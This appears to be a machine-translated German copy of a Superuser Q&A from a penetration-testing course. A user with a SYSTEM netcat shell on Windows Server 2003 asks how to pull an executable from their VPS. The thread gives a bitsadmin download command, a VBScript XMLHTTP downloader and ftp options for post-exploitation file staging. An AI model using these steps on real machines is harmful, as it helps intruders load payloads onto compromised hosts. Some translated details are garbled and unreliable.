So laden Sie die Datei mit CMD.exe herunter

1780
Entropy

Ich versuche, eine ausführbare Datei unter Windows Server 2003 als Teil des Penetration Testing-Kurses herunterzuladen, den ich gerade mache, und ich scheine zu versagen ... Powershell ist nicht aktiviert und bitsadmin ist nur "einfrieren".

C:\dlhere>bitsadmin /transfer ez http://vps/executable.exe C:\dlhere\test.exe bitsadmin /transfer ez http://vps/executable.exe C:\dlhere\test.exe  BITSADMIN version 2.0 [ 6.6.3790.1830 ] BITS administration utility. (C) Copyright 2000-2004 Microsoft Corp. 

Ich bin gerade ahnungslos ...

Ich habe gerade Kommandozeilenzugriff mit "nt authority \ systemd" erworben.

0
Ihre Kursnotizen sollten hilfreicher sein als wir. ivan_pozdeev vor 8 Jahren 1
"procmon" und / oder ein Sniffer können Aufschluss darüber geben, was in Bezug auf das Netzwerk und das Netzwerk passiert. Sie benötigen natürlich Administratorrechte. ivan_pozdeev vor 8 Jahren 0
Nun, es ist nicht selbstverständlich - eher eine Herausforderung ... wir haben keine Papiere außer der Verbindung zum lokalen Netzwerk. Entropy vor 8 Jahren 0
Einige der Lösungen sollten hier funktionieren: [Kann mit der Windows-Befehlszeile heruntergeladen werden?] (Http://superuser.com/questions/59465/isit-possible-to-download- using-the-windows -Befehlszeile) Wenn Sie Zugriff auf Systemebene haben, können Sie PowerShell erneut aktivieren. Ben N vor 8 Jahren 3
Ich habe gerade versucht, es irgendwie wieder zu aktivieren, aber ich habe bemerkt, dass es nicht einmal dort ist ... es ist komplett weg. Entropy vor 8 Jahren 0
Windows Server 2005 wie? :) Ƭᴇcʜιᴇ007 vor 8 Jahren 1
Wenn es sich um Server _2003_ handelt, ist Powershell tatsächlich eine optionale Komponente. ivan_pozdeev vor 8 Jahren 0

1 Antwort auf die Frage

0
ivan_pozdeev

Laut BITSAdmin Tool - MSDN ( /TransferAbschnitt wechseln):

BITSAdmin aktualisiert das Befehlsfenster mit Fortschrittsinformationen, bis die Übertragung abgeschlossen ist oder ein kritischer Fehler auftritt. BITSAdmin schließt den Job ab, wenn alle Dateien erfolgreich übertragen wurden, und bricht den Job ab, wenn ein kritischer Fehler auftritt. BITSAdmin erstellt den Job nicht, wenn er dem Job keine Dateien hinzufügen kann oder wenn Sie einen ungültigen Wert für type oder job_priority angeben. Beachten Sie, dass BITSAdmin weiterhin ausgeführt wird, wenn ein vorübergehender Fehler auftritt. Um BITSAdmin zu beenden, drücken Sie Strg + C.

Da BITS für die Übertragung im Hintergrundmodus entwickelt wurde, kann dies eine unbestimmte Zeit in Anspruch nehmen, wenn das Netzwerk ausgelastet ist. Dies gilt insbesondere für den Fall, dass der BITS-Dienst nicht ausgeführt wird (ich habe nicht überprüft, ob der Befehl ihn startet).

  • Abgesehen davon können Sie mit der .NET-Funktionalität herunterladen. Wie kann ich Dateien von der Befehlszeile in Windows herunterladen, wie es Wget tut? auch bei deaktivierter PowerShell, da csc.exeder C # -Compiler mit .NET gebündelt ist.

  • Dies kann auch mit cscriptdem XMLHTTP-COM-Objekt unter Verwendung von Windows Script Host und COM zum Hacken von Windows durchgeführt werden (die Skriptdatei kann mit geschrieben werden copy con):

    dim XmlHttp, URL, FileName, OutputStream URL = <URL> FileName = <FILENAME> set XmlHttp = WScript.CreateObject("MSXML2.XMLHTTP") set OutputStream = WScript.CreateObject("ADODB.Stream") XmlHttp.Open "GET", URL, false XmlHttp.Send OutputStream.Type = 1 'BINARY_STREAM_TYPE OutputStream.Open OutputStream.Write XmlHttp.responseBody OutputStream.SaveToFile FileName, 2 'CREATE_OVERWRITE_SAVE_MODE OutputStream.Close 
  • andere netzwerkdienstprogramme, die in der lage sind, können auch - telnetund ftp-. Diese sind jedoch seit Vista nicht standardmäßig enthalten.

Es gibt FTP, aber ich kann anscheinend nichts tun ... Ich habe eine Netcat-Shell. Entropy vor 8 Jahren 0
Nun, Sie müssen die FTP-Konsolenbefehle kennen, und Firewalls (bis zu Ihrem externen Server) sollten FTP-Verkehr zulassen. Der passive Modus (der _not_ ist der Standard für das Konsolenprogramm) ist wahrscheinlich ebenfalls erforderlich. ivan_pozdeev vor 8 Jahren 0